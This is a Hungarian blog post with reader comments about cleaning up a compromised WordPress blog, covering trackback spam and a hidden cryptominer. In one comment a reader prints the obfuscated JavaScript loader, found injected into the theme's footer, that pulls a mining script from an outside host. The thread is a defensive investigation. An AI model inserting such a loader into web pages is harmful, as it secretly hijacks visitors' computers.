Egy korábbi írás komment rovatában érdekes beszélgetés alakult ki. Habár úgy néz ki, a blog – mind szkriptek, mind php szinten – ártatlan, de valami köze mégiscsak lehet az anomáliákhoz.
Nos, egy lehetőséget találtam: az utóbbi pár napban megjelentek szemmel láthatóan szkriptek által generált trackback/pingback bejegyzések a kommentek között. És mivel a legutolsó kommentek kint vannak a nyitólapon is, így elképzelhető, hogy behúznak valami szkriptet.
Nos, kábé 5-6 éve, amióta a blog saját telepítésű WordPress alá költözött, tiltva van minden trackback/pingback. De a korábbi bejegyzéseknél (volt ám rengeteg költözés) bejegyzés szinten engedélyezve maradtak, mely beállítás felülírja a globálisat. Ezeken a régi bejegyzéseken keresztül jelentek meg a gyanús visszapingelések is.
Az nyilván nem működik, hogy nekiállok és az első 7-8 év összes bejegyzésében kézzel letiltom a visszajelzéseket. Enélkül viszont csak az marad, hogy moderálok. Első körben még nem mindent, egyelőre csak a “[…]” karaktersorozatra szűrök. Szóval légy olyan jó és ne használj ilyet.
PS.
Szomorú, de a tesztek azt mutatták, hogy a […] karaktersorozatot a WordPress _nem_ tekinti szónak, így nem lehet rá szűrni. Más szűrési alap viszont nincs. Marad az, hogy az _összes_ komment moderálásra kerül. Szar ügy. Tizenharmadik évébe fordult a blog, eddig kibírtam moderálás nélkül… és most sem trollok meg idióták miatt kell, hanem gazemberek miatt.
Megjegyzem, elég gusztustalan lény az ember. Van ugye ez az információterjesztés, melynek internet a neve, kitalálnak valamilyen automata mechanizmust, mely segítségével az azonos tartalmak között kapcsolat épülhet – erre jönnek a hiénák, rábuknak és megpróbálnak pofátlan módon pénzt csinálni belőle, melynek az lesz a vége, hogy mindenki melózhat azzal, hogy az alapvetően jó mechanizmust hogyan korlátozza, végső esetben hogyan tiltsa le. Most például az lett a vége, hogy nektek kellemetlenség, nekem meg egy csomó pluszmunka.
Na, mindegy, azért szétnézek még, van-e valami jobb megoldás.
[UPDATE]
Modera kikapcsolva. Félelmetes, mire képes a WP bulk editálási opciója. Félóra alatt végigmentem mind az 5000 bejegyzésen, letiltottam a track/pingback-et, kitöröltem a gyanús kommenteket. Mellesleg rátettem a blogra két exploit checker plug-int, nem találtak lényeges hibát. (Csak megjegyzem, amíg csináltam, jött is megint négy.)
2018. March 03. Saturday at 11:51
Sajnos még mindig fut a cryptóbányász plugin.
Szerintem a gravartar pluginoddal jön, azt kéne kikapcsolni.
2018. March 03. Saturday at 12:07
Kikapcsoltam. Bár nem nagyon hiszek benne.
Ha tudsz tesztelni, nézd már meg.
2018. March 03. Saturday at 12:12
Na, ez a kód a ludas a forrásodban. Ha ezt deobfuskálod itt : http://jsbeautifier.org/ akkor látod, hogy ez hívja be a web . stati . bid oldalt.
var _0x29b4=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x73\x74\x61\x74\x69\x2E\x62\x69\x64\x2F\x6A\x73\x2F\x59\x51\x48\x48\x41\x41\x55\x44\x59\x77\x42\x46\x67\x6C\x44\x58\x67\x30\x56\x53\x42\x56\x57\x79\x45\x44\x51\x35\x64\x78\x47\x43\x42\x54\x4E\x54\x38\x55\x44\x47\x55\x42\x42\x54\x30\x7A\x50\x46\x55\x6A\x43\x74\x41\x52\x45\x32\x4E\x7A\x41\x56\x4A\x53\x49\x50\x51\x30\x46\x4A\x41\x42\x46\x55\x56\x54\x4B\x5F\x41\x41\x42\x4A\x56\x78\x49\x47\x45\x6B\x48\x35\x51\x43\x46\x44\x42\x41\x53\x56\x49\x68\x50\x50\x63\x52\x45\x71\x59\x52\x46\x45\x64\x52\x51\x63\x73\x55\x45\x6B\x41\x52\x4A\x59\x51\x79\x41\x58\x56\x42\x50\x4E\x63\x51\x4C\x61\x51\x41\x56\x6D\x34\x43\x51\x43\x5A\x41\x41\x56\x64\x45\x4D\x47\x59\x41\x58\x51\x78\x77\x61\x2E\x6A\x73\x3F\x74\x72\x6C\x3D\x30\x2E\x35\x30″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64”];var el=document[_0x29b4[1]](_0x29b4[0]);el[_0x29b4[2]]= _0x29b4[3];document[_0x29b4[5]][_0x29b4[4]](el)
2018. March 03. Saturday at 12:14
És ez még most is benne van. Akkor nem a gravatar plugin okozza.
2018. March 03. Saturday at 12:38
Hmm… Nagyon ravasz. Úgy néz ki, hogy a Toothpaste téma footer sablonjába vagy a téma készítője, vagy valaki belebarmolta ezt a blokkot, persze kódoltan. Szemmel láthatóan utólag lett hozzáadva, a sablon komment mezője csak utána jön.
Kiszedtem, aztán meglátjuk.
2018. March 04. Sunday at 18:37
Egyébként ez akár automatizáltan is történhetett a tárhelyeden, az viszont olyan lyukon is befért, amit te nem fogsz tudni foltozni. :(
2018. March 03. Saturday at 12:41
Most nem tekeri.
Ha az FTP logok megvannak, akkor azt én visszanézném, hogy az az adott fájl mikor módosulhatott.
Ha nem FTP-vel került fel, akkor érdemes lenne elgondolkodni, mikor, mit frissítettél az elmúlt időszakban. Ha semmit, akkor sajnos luk van valahol. Ez esetben a http-logokban kéne keresni gyanús dolgot, de ez már elég nagy meló, mert ott ugye a POST body már nincs naplózva.
2018. March 03. Saturday at 12:46
Elég régóta nem piszkáltam a blog dolgait, az utóbbi napokban biztosan nem. Ha jött WP update vagy plugin update vagy téma update, azokat fel szoktam tolni egyből.
A logböngészés… háát, majd ha lesz időm.
2018. March 03. Saturday at 12:46
Ja, és köszi a segítséget! :)
2018. March 03. Saturday at 13:11
Szívesen. Számomra is érdekes nyomozás volt. :-)
2018. March 04. Sunday at 14:33
Csak egy megerősítés: nem tekeri már :-)
2018. March 04. Sunday at 18:34
+1 nem okoz már gondot. Esetleg azt lehet még megnézni, van-e a témának github repója, zt ellenőrizni, abban van-e ez a turpisság. Ha erre nincs lehetőség, akkor sajnos tényleg csak napló nézegetés.
Sajnos a wp magában hordozza a veszélyt, óriási a felhasználói bázis, ezért érdemes támadni, viszont a felhasználók nem mélyednek bele ennyire, hogy ellenőrizzék a rosszindulatú dolgokat. A közösség ereje nagy lehet, de nem végtelen.
Valóban érdekes nyomozás volt :)